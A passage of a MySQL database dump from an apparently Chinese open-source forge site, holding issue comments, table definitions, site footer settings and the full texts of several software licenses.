02:40:27',0,NULL,0,NULL),(237,168,'Issue',47,NULL,'2020-08-25 02:40:33',0,NULL,0,NULL),(239,149,'Issue',47,'我们测试了下,可以打开,但是打开速度较慢,用的360极速版','2020-08-25 02:41:36',0,NULL,0,NULL),(240,215,'Issue',47,'火狐浏览器下的已修复','2020-08-25 03:10:30',0,NULL,0,NULL),(241,215,'Issue',47,NULL,'2020-08-25 03:10:35',0,NULL,0,NULL),(242,218,'Issue',46,'明白了','2020-08-25 07:36:16',0,NULL,0,NULL),(243,219,'Issue',46,NULL,'2020-08-25 07:37:42',0,NULL,0,NULL),(244,217,'Issue',46,'不像你所说的那样,数字没有消失啊,我重新刷新了n次界面,也没有消失啊。\n\n','2020-08-25 07:42:27',0,233,0,NULL),(245,215,'Issue',46,'火狐和Edge都可以了,谢谢!','2020-08-25 08:19:09',0,240,0,NULL),(246,220,'Issue',46,NULL,'2020-08-25 08:32:20',0,NULL,0,NULL),(247,149,'Issue',46,NULL,'2020-08-25 08:48:12',0,NULL,0,NULL),(248,149,'Issue',46,NULL,'2020-08-25 08:49:08',0,NULL,0,NULL),(249,218,'Issue',63,NULL,'2020-08-25 08:51:44',0,NULL,0,NULL),(250,217,'Issue',47,'点击 消息呢 ?\n','2020-08-25 09:23:06',0,233,0,NULL),(251,219,'Issue',47,NULL,'2020-08-25 09:30:25',0,NULL,0,NULL),(252,220,'Issue',47,'点赞 自己的帖子 会发生跳转?','2020-08-25 09:31:30',0,NULL,0,NULL),(253,222,'Issue',46,NULL,'2020-08-26 08:47:00',0,NULL,0,NULL),(254,221,'Issue',47,NULL,'2020-08-26 10:21:49',0,NULL,0,NULL),(255,222,'Issue',47,NULL,'2020-08-27 06:01:29',0,NULL,0,NULL),(256,223,'Issue',1,'dddd','2020-09-07 08:34:39',0,NULL,0,NULL),(257,220,'Issue',63,NULL,'2020-09-15 00:29:03',0,NULL,0,NULL),(258,224,'Issue',49,NULL,'2020-10-15 00:56:46',0,NULL,0,NULL),(263,250,'Issue',155,NULL,'2021-01-22 08:13:20',0,NULL,0,NULL),(264,251,'Issue',155,NULL,'2021-01-22 08:19:28',0,NULL,0,NULL),(265,251,'Issue',155,NULL,'2021-01-22 08:21:18',0,NULL,0,NULL),(266,251,'Issue',155,'收到','2021-01-25 05:34:07',0,NULL,0,NULL),(267,266,'Issue',49,NULL,'2021-02-22 09:08:22',0,NULL,0,NULL),(268,266,'Issue',49,'asd','2021-02-22 09:08:50',0,NULL,0,NULL),(269,262,'Issue',156,'修改之后试一下二次pr','2021-02-22 11:19:55',0,NULL,0,NULL),(270,267,'Issue',122,NULL,'2021-02-22 11:21:42',0,NULL,0,NULL),(271,273,'Issue',73,NULL,'2021-03-01 08:25:02',0,NULL,0,NULL),(272,274,'Issue',46,NULL,'2021-03-02 07:00:53',0,NULL,0,NULL),(273,275,'Issue',128,'','2021-03-02 09:40:55',0,NULL,0,NULL),(274,274,'Issue',128,'无法登陆的账号提供一下\n','2021-03-02 09:41:54',0,NULL,0,NULL),(275,274,'Issue',48,NULL,'2021-03-02 09:59:27',0,NULL,0,NULL),(276,274,'Issue',48,'域名设置的原因,问题已解决,请查收!\n\n@李明军','2021-03-02 10:00:28',0,NULL,0,NULL),(277,278,'Issue',181,NULL,'2021-03-03 03:01:15',0,NULL,0,NULL),(278,274,'Issue',46,'我这里还是存在上述问题\n','2021-03-03 03:15:34',0,276,0,NULL),(279,274,'Issue',46,'我的账号:p78543092','2021-03-03 03:16:37',0,276,0,NULL),(280,283,'Issue',49,NULL,'2021-03-03 03:20:15',0,NULL,0,NULL),(281,288,'Issue',49,NULL,'2021-03-03 06:48:28',0,NULL,0,NULL),(282,290,'Issue',49,NULL,'2021-03-03 06:56:05',0,NULL,0,NULL),(283,283,'Issue',49,NULL,'2021-03-03 07:28:30',0,NULL,0,NULL),(284,297,'Issue',49,NULL,'2021-03-03 07:28:43',0,NULL,0,NULL),(285,295,'Issue',49,NULL,'2021-03-03 07:28:58',0,NULL,0,NULL),(286,294,'Issue',49,NULL,'2021-03-03 07:29:12',0,NULL,0,NULL),(287,293,'Issue',49,NULL,'2021-03-03 07:29:23',0,NULL,0,NULL),(288,292,'Issue',49,NULL,'2021-03-03 07:29:36',0,NULL,0,NULL),(289,291,'Issue',49,NULL,'2021-03-03 07:29:54',0,NULL,0,NULL),(290,288,'Issue',49,NULL,'2021-03-03 07:30:01',0,NULL,0,NULL),(291,289,'Issue',49,NULL,'2021-03-03 07:30:17',0,NULL,0,NULL),(292,286,'Issue',49,NULL,'2021-03-03 07:30:36',0,NULL,0,NULL),(293,284,'Issue',49,NULL,'2021-03-03 07:30:57',0,NULL,0,NULL),(294,273,'Issue',49,NULL,'2021-03-03 07:31:22',0,NULL,0,NULL),(295,285,'Issue',49,NULL,'2021-03-03 07:32:38',0,NULL,0,NULL),(296,298,'Issue',49,NULL,'2021-03-04 06:46:25',0,NULL,0,NULL),(297,299,'Issue',49,NULL,'2021-03-04 07:17:01',0,NULL,0,NULL),(298,298,'Issue',49,NULL,'2021-03-04 07:17:16',0,NULL,0,NULL),(299,300,'Issue',49,NULL,'2021-03-04 07:17:27',0,NULL,0,NULL),(300,305,'Issue',49,NULL,'2021-03-09 01:15:11',0,NULL,0,NULL),(301,304,'Issue',133,NULL,'2021-03-09 06:17:03',0,NULL,0,NULL),(302,306,'Issue',49,NULL,'2021-03-10 07:32:54',0,NULL,0,NULL),(303,308,'Issue',49,NULL,'2021-03-11 01:39:01',0,NULL,0,NULL),(304,303,'Issue',128,NULL,'2021-03-11 01:47:48',0,NULL,0,NULL);
|
||
/*!40000 ALTER TABLE `journals` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `journals_for_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `journals_for_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `journals_for_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`jour_id` int(11) DEFAULT NULL,
|
||
`jour_type` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`notes` text,
|
||
`status` int(11) DEFAULT NULL,
|
||
`reply_id` int(11) DEFAULT NULL,
|
||
`created_on` datetime NOT NULL,
|
||
`updated_on` datetime NOT NULL,
|
||
`m_parent_id` varchar(255) DEFAULT NULL,
|
||
`is_readed` tinyint(1) DEFAULT NULL,
|
||
`m_reply_count` int(11) DEFAULT NULL,
|
||
`m_reply_id` int(11) DEFAULT NULL,
|
||
`is_comprehensive_evaluation` int(11) DEFAULT NULL,
|
||
`private` int(11) DEFAULT '0',
|
||
`root_id` int(11) DEFAULT NULL,
|
||
`hidden` tinyint(1) DEFAULT '0',
|
||
`praises_count` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_journals_for_messages_on_root_id` (`root_id`),
|
||
KEY `index_journals_for_messages_on_jour_id` (`jour_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `journals_for_messages`
|
||
--
|
||
|
||
LOCK TABLES `journals_for_messages` WRITE;
|
||
/*!40000 ALTER TABLE `journals_for_messages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `journals_for_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `kindeditor_assets`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `kindeditor_assets`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `kindeditor_assets` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`asset` varchar(255) DEFAULT NULL,
|
||
`file_size` int(11) DEFAULT NULL,
|
||
`file_type` varchar(255) DEFAULT NULL,
|
||
`owner_id` int(11) DEFAULT NULL,
|
||
`asset_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`owner_type` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `kindeditor_assets`
|
||
--
|
||
|
||
LOCK TABLES `kindeditor_assets` WRITE;
|
||
/*!40000 ALTER TABLE `kindeditor_assets` DISABLE KEYS */;
|
||
INSERT INTO `kindeditor_assets` VALUES (1,'4972d91fb6f5.png',550075,'image/png',0,'image','2019-04-18 17:09:15','2019-04-18 17:09:15',NULL),(2,'0ba3015c4450.jpg',99260,'image/jpeg',0,'image','2020-07-31 23:36:35','2020-07-31 23:36:35',NULL),(3,'70246d93a3cb.png',775456,'image/png',0,'image','2020-08-18 11:58:37','2020-08-18 11:58:37',NULL);
|
||
/*!40000 ALTER TABLE `kindeditor_assets` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `labels`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `labels`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `labels` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `labels`
|
||
--
|
||
|
||
LOCK TABLES `labels` WRITE;
|
||
/*!40000 ALTER TABLE `labels` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `labels` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `laboratories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `laboratories`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `laboratories` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`school_id` bigint(20) DEFAULT NULL,
|
||
`identifier` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`sync_course` tinyint(1) DEFAULT '0',
|
||
`sync_subject` tinyint(1) DEFAULT '0',
|
||
`sync_shixun` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_laboratories_on_identifier` (`identifier`),
|
||
KEY `index_laboratories_on_school_id` (`school_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `laboratories`
|
||
--
|
||
|
||
LOCK TABLES `laboratories` WRITE;
|
||
/*!40000 ALTER TABLE `laboratories` DISABLE KEYS */;
|
||
INSERT INTO `laboratories` VALUES (1,NULL,'www','2019-10-16 15:16:11','2019-10-16 15:16:11',0,0,0);
|
||
/*!40000 ALTER TABLE `laboratories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `laboratory_settings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `laboratory_settings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `laboratory_settings` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`laboratory_id` bigint(20) DEFAULT NULL,
|
||
`config` text,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_laboratory_settings_on_laboratory_id` (`laboratory_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `laboratory_settings`
|
||
--
|
||
|
||
LOCK TABLES `laboratory_settings` WRITE;
|
||
/*!40000 ALTER TABLE `laboratory_settings` DISABLE KEYS */;
|
||
INSERT INTO `laboratory_settings` VALUES (1,1,'{\"name\":\"可控开源社区\",\"navbar\":[{\"name\":\"首页\",\"link\":\"https://osredm.com\",\"hidden\":false},{\"name\":\"开源项目\",\"link\":\"/projects\",\"hidden\":false},{\"name\":\"创客空间\",\"link\":\"https://osredm.com/tasks/list\",\"hidden\":false},{\"name\":\"竞赛活动\",\"link\":\"https://osredm.com/competitions\",\"hidden\":false},{\"name\":\"论坛交流\",\"link\":\"https://osredm.com/forums\",\"hidden\":false},{\"name\":\"交流问答\",\"link\":null,\"hidden\":true}],\"footer\":\"\\u003cdiv class=\\\"newFooter edu-txt-center\\\"\\u003e\\r\\n\\r\\n \\u003cdiv class=\\\"footerbottom edu-txt-center\\\" style=\\\"width: 100%;height: 92px;background-color: #323232;color: #ccc;padding-top: 25px;\\\"\\u003e\\u003cp class=\\\"mb10\\\"\\u003e\\r\\n \\u003cspan class=\\\"mr15\\\"\\u003e\\u003ci class=\\\"iconfont icon-weibiaoti- font-16\\\"\\u003e\\u003c/i\\u003e+86-010-66870287\\u003c/span\\u003e\\r\\n \\u003cspan class=\\\"mr15\\\"\\u003e\\u003ci class=\\\"iconfont icon-mail font-16\\\"\\u003e\\u003c/i\\u003elimj_9803@163.com\\u003c/span\\u003e\\r\\n \\u003cspan class=\\\"mr15\\\"\\u003e\\u003ci class=\\\"iconfont icon-xiazai18 font-16\\\"\\u003e\\u003c/i\\u003e 北京市丰台区东大街53号院\\u003c/span\\u003e\\r\\n \\u003c/p\\u003e\\r\\n \\u003cp\\u003e版权所有:可控开源社区\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003ca href=\\\"http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=11010802034576\\\" style=\\\"color: #ccc; margin-right: 20px;\\\"\\u003e\\u003cimg src=\\\"https://forge.osredm.com/police.png\\\" style=\\\"width: 16px;border-radius: 10px;margin-right: 3px\\\"/\\u003e京公网安备 11010802034576 号\\u003c/a\\u003e\\u003ca href=\\\"https://beian.miit.gov.cn/#/Integrated/index\\\" style=\\\"color: #ccc\\\"\\u003e京ICP备2021005060\\u003c/a\\u003e\\u003c/p\\u003e\\r\\n \\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\"}');
|
||
/*!40000 ALTER TABLE `laboratory_settings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `laboratory_users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `laboratory_users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `laboratory_users` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`laboratory_id` bigint(20) DEFAULT NULL,
|
||
`user_id` bigint(20) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_laboratory_users_on_laboratory_id` (`laboratory_id`),
|
||
KEY `index_laboratory_users_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `laboratory_users`
|
||
--
|
||
|
||
LOCK TABLES `laboratory_users` WRITE;
|
||
/*!40000 ALTER TABLE `laboratory_users` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `laboratory_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `licenses`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `licenses`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `licenses` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_secret` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=361 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `licenses`
|
||
--
|
||
|
||
LOCK TABLES `licenses` WRITE;
|
||
/*!40000 ALTER TABLE `licenses` DISABLE KEYS */;
|
||
INSERT INTO `licenses` VALUES (1,'Frameworx-1.0','THE FRAMEWORX OPEN LICENSE 1.0\n\nThis License Agreement, The Frameworx Open License 1.0, has been entered into\nbetween The Frameworx Company and you, the licensee hereunder, effective as\nof Your acceptance of the Frameworx Code Base or an Downstream Distribution\n(each as defined below).\n\nAGREEMENT BACKGROUND\n\nThe Frameworx Company is committed to the belief that open source software\nresults in better quality, greater technical and product innovation in the\nmarket place and a more empowered and productive developer and end-user community.\nOur objective is to ensure that the Frameworx Code Base, and the source code\nfor improvements and innovations to it, remain free and open to the community.To\nfurther these beliefs and objectives, we are distributing the Frameworx Code\nBase, without royalties and in source code form, to the community pursuant\nto this License Agreement.\n\nAGREEMENT TERMS\n\nThe Frameworx Company and You have agreed as follows:\n\n 1. Definitions.The following terms have the following respective meanings:\n\n(a) Frameworx Code Base means the software developed by The Frameworx Company\nand made available under this License Agreement\n\n(b) Downstream Distribution means any direct or indirect release, distribution\nor remote availability of software (i) that directly or indirectly contains,\nor depends for its intended functioning on, the Frameworx Code Base or any\nportion or element thereof and (ii) in which rights to use and distribute\nsuch Frameworx Code Base software depend, directly or indirectly, on the License\nprovided in Section 2 below.\n\n(c) \"Source Code\" to any software means the preferred form for making modifications\nto that software, including any associated documentation, interface definition\nfiles and compilation or installation scripts, or any version thereof that\nhas been compressed or archived, and can be reconstituted, using an appropriate\nand generally available archival or compression technology.\n\n(d) Value-Added Services means any commercial or fee-based software-related\nservice, including without limitation: system or application development or\nconsulting; technical or end-user support or training; distribution maintenance,\nconfiguration or versioning; or outsourced, hosted or network-based application\nservices.\n\n2. License Grant. Subject to the terms and conditions hereof, The Frameworx\nCompany hereby grants You a non-exclusive license (the License), subject to\nthird party intellectual property claims, and for no fee other than a nominal\ncharge reflecting the costs of physical distribution, to:\n\n(a) use the Frameworx Code Base, in either Source Code or machine-readable\nform;\n\n(b) make modifications, additions and deletions to the content or structure\nof the Frameworx Code Base; or\n\n(c) create larger works or derivative works including the Frameworx Code Base\nor any portion or element thereof; and\n\n(d) release, distribute or make available, either generally or to any specific\nthird-party, any of the foregoing in Source Code or binary form.\n\n3. License Conditions. The grant of the License under Section 1 hereof, and\nyour exercise of all rights in connection with this License Agreement, will\nremain subject to the following terms and conditions, as well as to the other\nprovisions hereof:\n\n(a) Complete Source Code for any Downstream Distribution directly or indirectly\nmade by You that contains, or depends for its intended functionality on, the\nFrameworx Code Base, or any portion or element thereof, shall be made freely\navailable to all users thereof on terms and conditions no more restrictive,\nand no less favorable for any user (including, without limitation, with regard\nto Source Code availability and royalty-free use) than those terms and conditions\nprovided in this License Agreement.\n\n(b) Any Value-Added Services that you offer or provide, directly or indirectly,\nin relation to any Downstream Distribution shall be offered and provided on\ncommercial terms that are reasonably commensurate to the fair market value\nof such Value-Added Services. In addition, the terms and conditions on which\nany such Value Added Services are so offered or provided shall be consistent\nwith, and shall fully support, the intent and purpose of this License Agreement.\n\n (c) All Downstream Distributions shall:\n\n(i) include all portions and elements of the Frameworx Code Base required\nto build the Source Code of such Downstream Distribution into a fully functional\nmachine-executable system, or additional build scripts or comparable software\nnecessary and sufficient for such purposes;\n\n(ii) include, in each file containing any portion or element of the Frameworx\nCode Base, the following identifying legend: This file contains software that\nhas been made available under The Frameworx Open License 1.0. Use and distribution\nhereof are subject to the restrictions set forth therein.\n\n(iii) include all other copyright notices, authorship credits, warranty disclaimers\n(including that provided in Section 6 below), legends, documentation, annotations\nand comments contained in the Frameworx Code Base as provided to You hereunder;\n\n(iv) contain an unaltered copy of the html file named frameworx_community_invitation.html\nincluded within the Frameworx Code Base that acknowledges new users and provides\nthem with information on the Frameworx Code Base community;\n\n(v) contain an unaltered copy of the text file named the_frameworx_license.txt\nincluded within the Frameworx Code Base that includes a text copy of the form\nof this License Agreement; and\n\n(vi) prominently display to any viewer or user of the Source Code of such\nOpen Downstream Distribution, in the place and manner normally used for such\ndisplays, the following legend:\n\nSource code licensed under from The Frameworx Company is contained herein,\nand such source code has been obtained either under The Frameworx Open License,\nor another license granted by The Frameworx Company. Use and distribution\nhereof is subject to the restrictions provided in the relevant such license\nand to the copyrights of the licensor thereunder. A copy of The Frameworx\nOpen License is provided in a file named the_frameworx_license.txt and included\nherein, and may also be available for inspection at http://www.frameworx.com.\n\n4. Restrictions on Open Downstream Distributions. Each Downstream Distribution\nmade by You, and by any party directly or indirectly obtaining rights to the\nFrameworx Code Base through You, shall be made subject to a license grant\nor agreement to the extent necessary so that each distributee under that Downstream\nDistribution will be subject to the same restrictions on re-distribution and\nuse as are binding on You hereunder. You may satisfy this licensing requirement\neither by:\n\n(a) requiring as a condition to any Downstream Distribution made by you, or\nby any direct or indirect distributee of Your Downstream Distribution (or\nany portion or element thereof), that each distributee under the relevant\nDownstream Distribution obtain a direct license (on the same terms and conditions\nas those in this License Agreement) from The Frameworx Company; or\n\n(b) sub-licensing all (and not less than all) of Your rights and obligations\nhereunder to that distributee, including (without limitation) Your obligation\nto require distributees to be bound by license restrictions as contemplated\nby this Section 4 above.\n\nThe Frameworx Company hereby grants to you all rights to sub-license your\nrights hereunder as necessary to fully effect the intent and purpose of this\nSection 4 above, provided, however, that your rights and obligations hereunder\nshall be unaffected by any such sublicensing. In addition, The Frameworx Company\nexpressly retains all rights to take all appropriate action (including legal\naction) against any such direct or indirect sub-licensee to ensure its full\ncompliance with the intent and purposes of this License Agreement.\n\n5. Intellectual Property. Except as expressly provided herein, this License\nAgreement preserves and respects Your and The Frameworx Companys respective\nintellectual property rights, including, in the case of The Frameworx Company,\nits copyrights and patent rights relating to the Frameworx Code Base.\n\n6. Warranty Disclaimer. THE SOFTWARE LICENSED HEREUNDER IS PROVIDED ``AS IS.\'\'\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT,\nARE HEREBY DISCLAIMED. IN NO EVENT SHALL THE LICENSOR OF THIS SOFTWARE, BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES INCLUDING (BUT NOT LIMITED TO) PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n7. License Violation. The License, and all of your rights thereunder, shall\nbe deemed automatically terminated and void as of any Downstream Distribution\ndirectly or indirectly made or facilitated by You that violates the provisions\nof this License Agreement, provided, however, that this License Agreement\nshall survive any such termination in order to remedy the effects of such\nviolation. This License Agreement shall be binding on the legal successors\nand assigns of the parties hereto.\n\nYour agreement to the foregoing as of the date hereof has been evidenced by\nyour acceptance of the relevant software distribution hereunder. (C) THE FRAMEWORX\nCOMPANY 2003\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(2,'Info-ZIP','Info-ZIP License\n\nCopyright (c) 1990-2009 Info-ZIP. All rights reserved.\n\nFor the purposes of this copyright and license, \"Info-ZIP\" is defined as the\nfollowing set of individuals:\n\nMark Adler, John Bush, Karl Davis, Harald Denker, Jean-Michel Dubois, Jean-loup\nGailly, Hunter Goatley, Ed Gordon, Ian Gorman, Chris Herborth, Dirk Haase,\nGreg Hartwig, Robert Heath, Jonathan Hudson, Paul Kienitz, David Kirschbaum,\nJohnny Lee, Onno van der Linden, Igor Mandrichenko, Steve P. Miller, Sergio\nMonesi, Keith Owens, George Petrov, Greg Roelofs, Kai Uwe Rommel, Steve Salisbury,\nDave Smith, Steven M. Schweda, Christian Spieler, Cosmin Truta, Antoine Verheijen,\nPaul von Behren, Rich Wales, Mike White.\n\nThis software is provided \"as is,\" without warranty of any kind, express or\nimplied. In no event shall Info-ZIP or its contributors be held liable for\nany direct, indirect, incidental, special or consequential damages arising\nout of the use of or inability to use this software.\n\nPermission is granted to anyone to use this software for any purpose, including\ncommercial applications, and to alter it and redistribute it freely, subject\nto the above disclaimer and the following restrictions:\n\n* Redistributions of source code (in whole or in part) must retain the above\ncopyright notice, definition, disclaimer, and this list of conditions.\n\n* Redistributions in binary form (compiled executables and libraries) must\nreproduce the above copyright notice, definition, disclaimer, and this list\nof conditions in documentation and/or other materials provided with the distribution.\nAdditional documentation is not needed for executables where a command line\nlicense option provides these and a note regarding this option is in the executable\'s\nstartup banner. The sole exception to this condition is redistribution of\na standard UnZipSFX binary (including SFXWiz) as part of a self-extracting\narchive; that is permitted without inclusion of this license, as long as the\nnormal SFX banner has not been removed from the binary or disabled.\n\n* Altered versions--including, but not limited to, ports to new operating\nsystems, existing ports with new graphical interfaces, versions with modified\nor added functionality, and dynamic, shared, or static library versions not\nfrom Info-ZIP--must be plainly marked as such and must not be misrepresented\nas being the original source or, if binaries, compiled from the original source.\nSuch altered versions also must not be misrepresented as being Info-ZIP releases--including,\nbut not limited to, labeling of the altered versions with the names \"Info-ZIP\"\n(or any variation thereof, including, but not limited to, different capitalizations),\n\"Pocket UnZip,\" \"WiZ\" or \"MacZip\" without the explicit permission of Info-ZIP.\nSuch altered versions are further prohibited from misrepresentative use of\nthe Zip-Bugs or Info-ZIP e-mail addresses or the Info-ZIP URL(s), such as\nto imply Info-ZIP will provide support for the altered versions.\n\n* Info-ZIP retains the right to use the names \"Info-ZIP,\" \"Zip,\" \"UnZip,\"\n\"UnZipSFX,\" \"WiZ,\" \"Pocket UnZip,\" \"Pocket Zip,\" and \"MacZip\" for its own\nsource and binary releases.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(3,'CC-BY-NC-4.0','Creative Commons Attribution-NonCommercial 4.0 International Creative Commons\nCorporation (\"Creative Commons\") is not a law firm and does not provide legal\nservices or legal advice. Distribution of Creative Commons public licenses\ndoes not create a lawyer-client or other relationship. Creative Commons makes\nits licenses and related information available on an \"as-is\" basis. Creative\nCommons gives no warranties regarding its licenses, any material licensed\nunder their terms and conditions, or any related information. Creative Commons\ndisclaims all liability for damages resulting from their use to the fullest\nextent possible.\n\nUsing Creative Commons Public Licenses\n\nCreative Commons public licenses provide a standard set of terms and conditions\nthat creators and other rights holders may use to share original works of\nauthorship and other material subject to copyright and certain other rights\nspecified in the public license below. The following considerations are for\ninformational purposes only, are not exhaustive, and do not form part of our\nlicenses.\n\n \n\nConsiderations for licensors: Our public licenses are intended for use by\nthose authorized to give the public permission to use material in ways otherwise\nrestricted by copyright and certain other rights. Our licenses are irrevocable.\nLicensors should read and understand the terms and conditions of the license\nthey choose before applying it. Licensors should also secure all rights necessary\nbefore applying our licenses so that the public can reuse the material as\nexpected. Licensors should clearly mark any material not subject to the license.\nThis includes other CC-licensed material, or material used under an exception\nor limitation to copyright. More considerations for licensors : wiki.creativecommons.org/Considerations_for_licensors\n\n \n\nConsiderations for the public: By using one of our public licenses, a licensor\ngrants the public permission to use the licensed material under specified\nterms and conditions. If the licensor\'s permission is not necessary for any\nreason–for example, because of any applicable exception or limitation to copyright–then\nthat use is not regulated by the license. Our licenses grant only permissions\nunder copyright and certain other rights that a licensor has authority to\ngrant. Use of the licensed material may still be restricted for other reasons,\nincluding because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked\nor described. Although not required by our licenses, you are encouraged to\nrespect those requests where reasonable. More considerations for the public\n: wiki.creativecommons.org/Considerations_for_licensees Creative Commons Attribution-NonCommercial\n4.0 International Public License\n\nBy exercising the Licensed Rights (defined below), You accept and agree to\nbe bound by the terms and conditions of this Creative Commons Attribution-NonCommercial\n4.0 International Public License (\"Public License\"). To the extent this Public\nLicense may be interpreted as a contract, You are granted the Licensed Rights\nin consideration of Your acceptance of these terms and conditions, and the\nLicensor grants You such rights in consideration of benefits the Licensor\nreceives from making the Licensed Material available under these terms and\nconditions.\n\n \n\n Section 1 – Definitions.\n\na. Adapted Material means material subject to Copyright and Similar Rights\nthat is derived from or based upon the Licensed Material and in which the\nLicensed Material is translated, altered, arranged, transformed, or otherwise\nmodified in a manner requiring permission under the Copyright and Similar\nRights held by the Licensor. For purposes of this Public License, where the\nLicensed Material is a musical work, performance, or sound recording, Adapted\nMaterial is always produced where the Licensed Material is synched in timed\nrelation with a moving image.\n\nb. Adapter\'s License means the license You apply to Your Copyright and Similar\nRights in Your contributions to Adapted Material in accordance with the terms\nand conditions of this Public License.\n\nc. Copyright and Similar Rights means copyright and/or similar rights closely\nrelated to copyright including, without limitation, performance, broadcast,\nsound recording, and Sui Generis Database Rights, without regard to how the\nrights are labeled or categorized. For purposes of this Public License, the\nrights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.\n\nd. Effective Technological Measures means those measures that, in the 